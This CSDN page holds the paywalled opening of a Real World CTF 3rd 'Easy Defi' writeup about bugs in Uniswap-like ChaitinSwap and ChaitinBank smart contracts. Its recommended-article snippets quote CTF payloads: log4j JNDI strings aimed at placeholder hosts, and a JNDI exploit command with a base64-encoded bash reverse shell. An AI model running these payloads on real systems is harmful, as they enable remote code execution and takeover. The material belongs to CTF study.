Real Wolrd CTF 3rd Writeup | Easy Defi

最新推荐文章于 2023-01-12 11:33:38 发布
最新推荐文章于 2023-01-12 11:33:38 发布
阅读量494 收藏
点赞数 1
分类专栏: 胖达的区块链安全工坊 文章标签: 区块链 智能合约 CTF writeup defi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cemao4548/article/details/115180254
版权
本文是Real World CTF 3rd Easy Defi挑战的writeup,涉及区块链智能合约审计。通过分析ChaitinSwap和ChaitinBank合约,揭示了K值不守恒与无预言机价格操纵两个漏洞,利用这些漏洞成功获取了FLAG。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目环境架构

EasyDefi是一道面向去中心化金融服务的智能合约题目。
题目代码通过附件的形式给出。

同时我们可以通过题目描述了解到
ChaitinSwap的逻辑和Uniswap基本类似,只是更改了手续费比例。
在这里插入图片描述

ChaitinBank听上去是某种提供了借贷服务的Defi项目,
我们看一下代码:

Bank仅提供了两个功能接口,一个用FeiCoin换Flag,另一个使用Flag换FeiCoin。
但是这个FeiCoin又是个啥?我们到ERC20.sol里面确认一下:
在这里插入图片描述

可见这里Panda币的合约名称叫FeiToken,看来FeiCoin和PandaToken是一个东西:

至此我们可以得到题目大概的组织框架如下:

最低0.47元/天 解锁文章
CTF入门--请输入密码
Quartz's Blog
09-05 5810
在一个网站上遇到了几个题目,自己看了看还是挺有趣的,故记录之初探题目 这里是一个密码框 显然是让我们输入密码,先随便试试吧,ll 来个123 然后结果看见,还被嘲讽了一番,(笑)开始分析做到动态的弹窗,肯定使用了动态脚本语言, 所以我们F12 来一探究竟 下面就是看到了我们,和密码相关的代码段了 逻辑清晰,简单高效 重要的就是下面的if的判断,得到pass1即可 然后打断点
python token取得,python获取token和cookie方法
weixin_35284593的博客
03-25 2188
获取token:token为接口参数返回值# -*- coding: utf-8 -*-# @File : get_token.py# @API_name:# @Time : 2018/12/11 10:37# @Author : guozhen.deng# 获取token ,处理逻辑:# 传递cookie 至http://a**********l.com/initiator/liv...
Real-World-CTF-3rd-Challenge-Attachments:RWCTF 3rd的挑战附件
04-15
真实世界CTF-3挑战装备 RWCTF 3rd的挑战附件。
2022 Real World CTF体验赛Writeup
Keepb1ue的博客
01-23 7623
还是太菜了 不配打Real World正赛(神仙打架),打打体验赛压压惊。 log4flag 提示log4j,测试payload:${jndi:rmi://xxx.dnslog.cn/Exp} 存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8} 直接搭建jndi服务,尝试反弹shell flag:rwctf{d4b4b837f95542aa9
2023第五届 Real World CTF 体验赛 Writeup(web)
一只爱吃橙子的羊
01-12 3099
2023第五届 Real World CTF 体验赛 Writeup(web)
2023 Real World CTF体验赛部分Writeup
Keepb1ue的博客
01-09 3193
2023 Real World CTF体验赛部分Writeup
2022 RealWorld CTF体验赛Writeup
末初 · mochu7
01-23 2126
文章目录Digital Souvenirlog4flagBe-a-Database-Hackerthe Secrets of Memorybaby flaglabFlag ConsoleBe-a-Database-Hacker 2Java Remote Debugger Digital Souvenir rwctf{RealWorldIsAwesome} log4flag 有一些正则过滤 网上bypass方法很多,随便找一个就行 ${${::-j}ndi:${lower:rmi}://vw3nw
Hello-Wolrd
03-15
标题“Hello-Wolrd”可能是指一个初学者入门级别的编程示例,通常在学习新语言时,人们会先从编写“Hello, World!”程序开始。这个程序简单地在控制台上打印出“你好,世界!”这样的欢迎信息,以此来验证开发环境的...
MAP OF THE WOLRD
09-02
MAP OF THE WOLRD
Mine_Wolrd-Version
03-14
"Mine_Wolrd-Version"很可能是该游戏的一个特定版本或者是与版本更新相关的内容。在这个主题下,我们将深入探讨《我的世界》游戏版本的重要知识点,以及如何理解和处理游戏版本。 1. **版本迭代**:在游戏开发过程...
2022 Real World CTF 体验赛 writeup
b1ackc4t的博客
01-23 2021
log4flag 最近风靡全球的log4j2漏洞,加了一个正则过滤 用log4j自带的语法便轻松绕过,然后常规jndi注入攻击,需要一台在公网的vps 在自己vps上使用工具搭建ldap服务 https://github.com/welk1n/JNDI-Injection-Exploit java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94LngueC54LzE
ctf从入门到放弃:token 与 csrf 的防范190514
爱党人士
05-15 2141
Token是如何防止CSRF的? CSRF的主要问题是敏感操作的链接容易被伪造,那么如何让这个链接不容易被伪造? -每次请求,都增加一个随机码(需要够随机,不容易伪造),后台每次对这个随机码进行验证! 用bp抓包,post型的: CSRF(token)项目的token生成代码: 有两点注意: 1.要生成新的 2.销毁旧的 最后,在后台有个这样的判断: $_GET[]= $_SESSION[] ...
web安全之token和CSRF攻击
热门推荐
梦空间
05-03 3万+
上文我转载了两篇关于ThinkPHP令牌验证的文章(ThinkPHP中的create方法与自动令牌验证)。其中提及到了  token ,这里针对 token 的作用,转载了另外两篇文章。 (web安全之token   Web安全之CSRF攻击) web安全之token 参考:http://blog.csdn.net/sum_rain/article/details/370
反序列化新的Gadget:com.sun.jndi.ldap.LdapAttribute
公众号shadow sock7
01-14 1398
这个CTF是1.4的Java。同时由于这个类在1.8中依然存在,所以也可以在1.8利用: 一些新手可能会被 ysoserial 里标注的利用链依赖库版本所迷惑,认为某个链就只能在对应标注的依赖版本下起作用,其实并非如此。像 ysoserial 里 CommonsBeanutils1 这个链,作者标注的依赖版本是: commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 但这些版本实际上反映的只是 ysoserial 作者在
巅峰极客第一场CTF部分writeup
郁离歌丶的博客
07-22 6237
额,上午驾校学车,中午打了会儿安恒的月赛,就来看巅峰极客的题了。时间关系实力原因没做几个emmmm太菜了wa MISC-warmup-100pt 拿到一个bmp文件,套路走一波,右键查看属性emmm啥都没有。 丢到winhex里面也没有什么明显的提示或者信息。 放大招:stegsolve。放在各个颜色通道里面过一遍。 可以明显的看到每个颜色通道的最低位有异常数据。 将数据提取出来 ...
2020RWCTF DBaaSadge WP
蚁景网安学院
01-13 687
亲爱的,关注我吧1/13本文字数5988预计阅读时间10分钟本文涉及知识点实操练习-使用burp进行暴力破解https://www.hetianlab.com/cour.do?w=1&a...
第二届红帽杯线上初赛 RedHat 2018 WriteUp
郁离歌丶的博客
05-02 5806
又是一个划水的比赛,作看高中生吊打全场orz,太强了。WEBsimple upload进入一个登陆页面,抓包之后发现cookie有admin=0改成1之后进入了一个上传页面,获取指纹之后,明显是Apache Tomcat,传一个一句话asp马过去试试。上传yulige.jsp.jpg<% if("023".equals(request.getParameter("pwd"))){ ...
WUST-CTF2020 writeup
abtgu的博客
04-02 1649
文章目录WEBcheckinadminMISCSpace ClubWelcome爬Find meShopgirlfriendAlison likes jojo WEB checkin 题目: 无 解题思路: 打开链接,发现提问作者,打开查看器,发现按钮被隐藏,输入框被限制,更改代码,输入作者名,提示一个博客 打开,在最上方发现flag的一部分 仔细查看,有一篇名为《远古的blog》的博客,打...
某单位2021年CTF初赛Writeup(部分)
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
11-08 4731
Web Web1 当时没截图,找了别人拍的照贴一下。。。 是一道简单题,不过考的知识点蛮多的。 Referer绕过、User-Agent绕过、XFF绕过之后,进行代码审计 这里的知识点: 使用科学计数法绕过取值大于1 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1 使用数组绕过类型判断 <?php echo intval(42); // 42 echo intval(4.2);
c语言怎么输出hellowolrd
最新发布
09-12
在C语言中输出"Hello, World!"的基本步骤如下: 1. 包含头文件:在C语言程序的顶部,通常需要包含标准输入输出库的头文件`stdio.h`,以便使用`printf()`函数进行输出。 ```c #include <stdio.h> ``` 2. 主函数:C语言程序的入口点是`main`函数。你需要定义一个`main()`函数,无论是在标准形式还是在`int main(int argc, char *argv[])`这种形式中,都可以用来输出文本。 ```c int main() { // 程序代码 } ``` 3. 使用`printf`函数输出文本:在`main()`函数中,使用`printf`函数来输出"Hello, World!"字符串。`printf`是一个标准输出函数,能够将格式化的字符串输出到标准输出设备,通常是屏幕。 ```c printf("Hello, World!\n"); ``` 综合以上步骤,一个完整的C语言程序来输出"Hello, World!"如下: ```c #include <stdio.h> int main() { printf("Hello, World!\n"); return 0; } ``` 在编写完程序后,你需要通过C语言编译器进行编译,生成可执行文件,然后运行该文件,才能看到"Hello, World!"的输出结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

可爱多多白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值